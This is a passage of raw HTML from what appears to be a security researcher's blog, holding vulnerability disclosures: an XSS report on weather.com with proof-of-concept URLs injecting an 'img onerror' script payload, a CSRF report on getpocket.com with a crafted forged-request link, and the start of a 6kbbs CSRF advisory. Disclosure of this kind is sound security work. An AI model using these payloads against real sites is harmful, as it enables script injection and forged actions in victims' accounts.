<span style="font-family: Arial,Helvetica,sans-serif;">The
vulnerability can be attacked without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
</div>
</div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /><span style="line-height: 19.6px; text-align: justify;"><br /></span></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/-T3Kjs-4XmSc/VHaXAw_oG8I/AAAAAAAAAZE/e1v9ebAtBis/s1600/weather_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-T3Kjs-4XmSc/VHaXAw_oG8I/AAAAAAAAAZE/e1v9ebAtBis/s1600/weather_1_xss.png" width="400" /></a></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/--5UajGMiSTI/VHaXAyoSHpI/AAAAAAAAAZI/ay10tmpGIbE/s1600/weather_2_xx.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/--5UajGMiSTI/VHaXAyoSHpI/AAAAAAAAAZI/ay10tmpGIbE/s1600/weather_2_xx.png" width="400" /></a></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes, e.g.</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/slideshows/main/" target="_blank">http://www.weather.com/<wbr></wbr>slideshows/main/</a>"--/>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/" target="_blank">http://www.weather.com/home-<wbr></wbr>garden/home/white-house-lawns-<wbr></wbr>20140316%22--/</a>"--/>"><img src=x onerror=prompt('justqdjing')><wbr></wbr>t%28%27justqdjing%27%29%3E</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.weather.com/news/main/" target="_blank">http://www.weather.com/news/<wbr></wbr>main/</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be">https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html">http://securityrelated.blogspot.com/2014/11/the-weather-channel-weather.html</a></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The Weather Channel has patched this Vulnerability in late November, 2014 (last Week). <span style="line-height: 19.6px; text-align: justify;">"The
Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools,
papers, news, and events of interest to the community. FD differs from
other security lists in its open nature and support for researchers'
right to decide how to disclose their own discovered bugs. The full
disclosure movement has been credited with forcing vendors to better
secure their products and to publicly acknowledge and fix flaws rather
than hide them. Vendor legal intimidation and censorship attempts are
not tolerated here!" A great many of the fllowing web securities have
been published here, Buffer overflow, HTTP Response Splitting (CRLF),
CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF,
Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage,
Denial of Service, File Inclusion, Weak Encryption, Privilege
Escalation, Directory Traversal, HTML Injection, Spam. This bug was
published at The Full Disclosure in November, 2014.</span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered by:</span></div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (<a href="https://twitter.com/justqdjing/status/558910579193040896">@justqdjing</a>)</span></div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
</div>
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br /><br /><br /><br /><br /><b><br /></b><b>More Details:</b></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/89">http://seclists.org/fulldisclosure/2014/Nov/89</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/3">http://lists.openwall.net/full-disclosure/2014/11/27/3</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-fixes-web-app-flaws-the">http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-flaw</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-exploit</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://diebiyi.com/articles/security/the-weather-channel-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8">http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-flaw</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201411475314523/">http://tetraph.blog.163.com/blog/static/234603051201411475314523/</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://tetraph.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://ithut.tumblr.com/post/121916595448/weather-channel-xss">http://ithut.tumblr.com/post/121916595448/weather-channel-xss</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://computerobsess.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-bug</a></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-60689996860586181572015-06-17T01:04:00.001-07:002015-06-17T01:05:35.322-07:00GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability<div style="margin-bottom: 1.3em;">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YKJkumXKUuk/VYEmlwr5u6I/AAAAAAAABEA/lA8DCglp-4M/s1600/pocket_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white;"><img border="0" height="253" src="http://4.bp.blogspot.com/-YKJkumXKUuk/VYEmlwr5u6I/AAAAAAAABEA/lA8DCglp-4M/s400/pocket_1.png" width="400" /></span></a></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span><span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></span>
<span style="line-height: 19.2000007629395px;"><b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">GetPocket getpocket.com CSRF (Cross-Site Request Forgery ) Web Security Vulnerability</span></b></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.2000007629395px;"><b>Domain: </b></span><span style="line-height: 19.2000007629395px;">getpocket.com</span></span></div>
<div style="direction: ltr; margin-bottom: 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.2000007629395px;">"Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. </span><span style="line-height: 19.2000007629395px;">The world's leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows." (From: https://getpocket.com/about)</span></span></div>
</div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="line-height: 21px;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><b style="background-color: white;">Vulnerability Description:</b></span></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28px;"><span style="line-height: 19.6000003814697px; text-align: justify;">Pocket</span></span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.6000003814697px;"> has a computer cyber security bug problem. Hacker can exploit it by CSRF attacks.</span></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 19.6000003814697px;"><br /></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; line-height: 19.6000003814697px;"> "Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application." (OWSAP)</span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tests were performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox (37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2),Apple Safari 6.1.6 of Mac OS X v10.9 Mavericks.</span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="text-align: justify;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 28px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Details:</span></b></div>
<div style="line-height: 28px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><span style="line-height: 21px;">The code programming flaw exists at "https://getpocket.com/edit/edit" page, i.e.</span><span style="line-height: 25.2000007629395px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;">Vulnerable URL:</span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small; line-height: 28px;">Use a website created by me for the following tests. The website is "</span><span style="line-height: 28px;"><a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a></span><span style="line-height: 28px;">". Suppose that this website is malicious. If it contains the following link, attackers can post any message as they like.</span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><a href="https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test">getpocket csrf test</a> [1]</span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">When a logged victim clicks the link ([1]), a new item will be successfully saved to his/her "Pocket" without his/her notice. An attack happens.</span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div style="line-height: 21px; margin-bottom: 1.3em;">
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><span style="line-height: 25.2000007629395px;"><span style="line-height: 25.2000007629395px;"><b>Poc Video:</b></span></span><a data-mce-href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" href="http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be" rel="nofollow" style="line-height: 25.2000007629395px;">http://www.youtube.com/watch?v=Kg743VboyoU&feature=youtu.be</a></span></div>
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 25.2000007629395px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Blog Detail:</b></span></div>
<div>
<a href="https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2014/04/29/getpocket-csrf/</a></div>
<div>
<a href="http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 28px;">http://www.tetraph.com/blog/csrf-vulnerability/getpocket-csrf-vulnerability/</a></div>
<div>
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html" style="background-color: white;">http://computerobsess.blogspot.com/2014/10/getpocket-csrf-vulnerability.html</a></span></div>
<div>
<a href="http://tetraph.blog.163.com/blog/static/23460305120143201422975/"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/23460305120143201422975/</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 21px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 28px;"><br /></span>
<div style="line-height: 25.2000007629395px;">
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="line-height: 28px;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discover and Reporter:</span></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.6000003814697px;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.</span><span style="font-size: small; line-height: 28px;"> (<a href="https://twitter.com/justqdjing/status/558921275054096384">@justqdjing</a>)</span></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="-webkit-transition: color 0.3s; line-height: 28px; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 28px;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-43901146032058268552015-06-14T02:11:00.000-07:002015-06-14T02:11:21.789-07:00CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RSoLxo0R5C0/VX1CW1WDnsI/AAAAAAAAATw/ojMON-8jct8/s1600/6kbbs_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="http://1.bp.blogspot.com/-RSoLxo0R5C0/VX1CW1WDnsI/AAAAAAAAATw/ojMON-8jct8/s400/6kbbs_4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 02, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 02, 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity Reference: WLB-2015040034 </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P) (legend)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 6.4</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Writer and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (</span><a href="https://twitter.com/justqdjing/status/583550839408627712">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Suggestion Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
